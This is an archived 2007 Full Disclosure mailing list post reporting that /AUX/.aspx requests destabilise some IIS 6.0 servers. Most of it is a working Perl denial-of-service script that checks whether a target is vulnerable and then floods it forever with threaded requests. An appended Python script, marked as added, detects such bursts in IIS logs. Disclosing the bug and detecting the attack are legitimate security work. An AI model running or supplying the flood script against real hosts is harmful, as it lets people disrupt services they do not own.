Full Disclosure mailing list archives
Question Regarding IIS 6.0 / Is this a DoS???
From: "kingcope" <kingcope () gmx net>
Date: Tue, 22 May 2007 07:10:08 +0200
Hello List,

Recently I saw a small bug in IIS 6.0 when requesting a special path.
When I request /AUX/.aspx the server takes a bit longer to respond than normally.
So I did write an automated script to see what happens if I request this file
several times at once. The result is that some servers on the internet get quite
unstable, some do not. On some servers after I stop the attack I get an exception
that the Server is too busy/Unhandled Exception on the wwwroot (/) path.

Can you/the list confirm that?

Here is a lame testing script for this stuff:

#When sending multiple parallel GET requests to an IIS 6.0 server requesting
#/AUX/.aspx the server gets unstable and non responsive. This happens only
#to servers which respond with a runtime error (System.Web.HttpException)
#and take two or more seconds to respond to the /AUX/.aspx GET request.
#
#
#signed,
#Kingcope kingcope () gmx net
##########################################################################
###***********************************************************************
###
###
###
### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
### by Kingcope, May/2007
### Better run this from a Linux system
##########################################################################

use IO::Socket;
use threads;

if ($ARGV[0] eq "") { exit; }
my $host = $ARGV[0];

$|=1;

sub sendit {
    $sock = IO::Socket::INET->new(PeerAddr => $host,
                                  PeerPort => 'http(80)',
                                  Proto    => 'tcp');

    print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n";
}

$sock = IO::Socket::INET->new(PeerAddr => $host,
                              PeerPort => 'http(80)',
                              Proto    => 'tcp');

print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n";

$k=0;
while (<$sock>) {
    if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
        $k=1;
        last;
    }
}

if ($k==0) {
    print "Server does not seem vulnerable to this attack.\n";
    exit;
}

print "ATTACK!\n";

while(1){

    for (my $i=0;$i<=100;$i++) {
        $thr = threads->new(\&sendit);
        print "\r\r\r$i/100 ";
    }

    foreach $thr (threads->list) {
        $thr->join;
    }
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
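The server-side view of the behaviour described in the post, as an added example that is not part of the original message: a Python check that reads IIS W3C extended logs and flags clients sending bursts of slow /AUX/.aspx requests. The log lines, function names, and the burst thresholds (3 hits within 10 seconds) are constructed assumptions; the 2000 ms cutoff mirrors the "two or more seconds" in the post, and `time-taken` is logged by IIS in milliseconds.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed IIS W3C extended log sample (addresses are documentation ranges).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status time-taken
2007-05-22 05:10:01 192.0.2.10 GET /default.aspx 200 15
2007-05-22 05:10:02 198.51.100.7 GET /AUX/.aspx 500 2210
2007-05-22 05:10:02 198.51.100.7 GET /aux/.aspx 500 2304
2007-05-22 05:10:03 198.51.100.7 GET /AUX/.aspx 500 3120
2007-05-22 05:10:03 198.51.100.7 GET /AUX/.aspx 500 4051
2007-05-22 05:10:40 192.0.2.10 GET /AUX/.aspx 500 2100
2007-05-22 05:10:41 192.0.2.10 GET /auxiliary/page.aspx 200 20
"""

def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))

def is_aux_request(uri_stem):
    """True when a whole path segment is the AUX device name, e.g. /AUX/.aspx."""
    return any(seg.lower() == "aux" for seg in uri_stem.split("/"))

def find_bursts(text, min_hits=3, window_s=10, slow_ms=2000):
    """Return {client_ip: peak_hits} for clients with >= min_hits slow AUX requests in one window."""
    per_client = defaultdict(list)
    for rec in parse_w3c(text):
        if is_aux_request(rec["cs-uri-stem"]) and int(rec["time-taken"]) >= slow_ms:
            stamp = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
            per_client[rec["c-ip"]].append(stamp)
    flagged = {}
    for ip, stamps in per_client.items():
        stamps.sort()
        start = best = 0
        for end, stamp in enumerate(stamps):  # sliding window over sorted timestamps
            while stamp - stamps[start] > timedelta(seconds=window_s):
                start += 1
            best = max(best, end - start + 1)
        if best >= min_hits:
            flagged[ip] = best
    return flagged

if __name__ == "__main__":
    print(find_bursts(SAMPLE_LOG))
```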